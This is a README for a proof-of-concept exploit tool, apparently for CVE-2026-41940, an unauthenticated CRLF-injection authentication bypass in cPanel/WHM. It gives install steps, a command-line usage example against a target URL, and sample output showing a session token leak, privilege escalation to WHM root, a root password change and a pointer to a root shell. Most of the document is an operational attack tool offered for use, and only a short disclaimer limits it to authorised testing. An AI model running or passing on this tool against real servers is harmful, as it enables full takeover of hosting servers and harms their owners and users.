Share
## https://sploitus.com/exploit?id=BC436FB3-74DD-51CA-B4BA-C6E6D76DDA61
# CVE-2026-41940 Auto Exploit

![Python](https://img.shields.io/badge/Python-3.x-blue)
![Status](https://img.shields.io/badge/Status-POC-orange)
![Author](https://img.shields.io/badge/Author-Rosemary1337-red)

---

## Overview

**CVE-2026-41940** is a proof-of-concept (PoC) exploit targeting **cPanel/WHM**.  
This exploit demonstrates an **unauthenticated authentication bypass** using CRLF injection to leak security tokens and gain root-level access to the WHM interface, allowing for actions such as changing the root password.

> **Disclaimer:** This PoC is for educational purposes only. Do **not** use on systems without permission.

---

## Features

- **Hostname Auto-discovery**: Automatically identifies the canonical hostname to bypass Host header restrictions.
- **Pre-auth Session Minting**: Generates a valid initial session for injection.
- **CRLF Injection**: Leverages injection in headers to leak the `cp_security_token`.
- **Session Propagation**: Forces the leaked token into the server's auth cache.
- **Root Password Reset**: Automatically changes the WHM root password upon successful bypass.
- **Minimal Dependencies**: Works with the standard `requests` library.

---

## Installation

1. Clone the repository:
```bash
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
```

2. Install dependencies:

```bash
pip install requests
```

> Requirements: `requests`, `urllib3`

---

## Usage

```bash
python3 CVE_2026_41940.py --target  --password 
```

### Example:

```bash
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
```

### Arguments

| Flag         | Description               | Required | Default |
| ------------ | ------------------------- | -------- | ------- |
| `--target`   | WHM Target URL (e.g., https://host:2087) | Yes      | -       |
| `--password` | New password for root user | Yes      | -       |
| `--hostname` | Override Host: header     | No       | Auto    |

---

## Output

The console shows:

* Status messages `[0-4]`
* Success `[+]`
* Fail `[!]`
* Info `[*]`

Example:

```
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
```

---

## Security & Disclaimer

* For **educational & testing purposes only**.
* Do **not** attack websites without explicit permission.
* Use in a controlled lab or authorized penetration test only.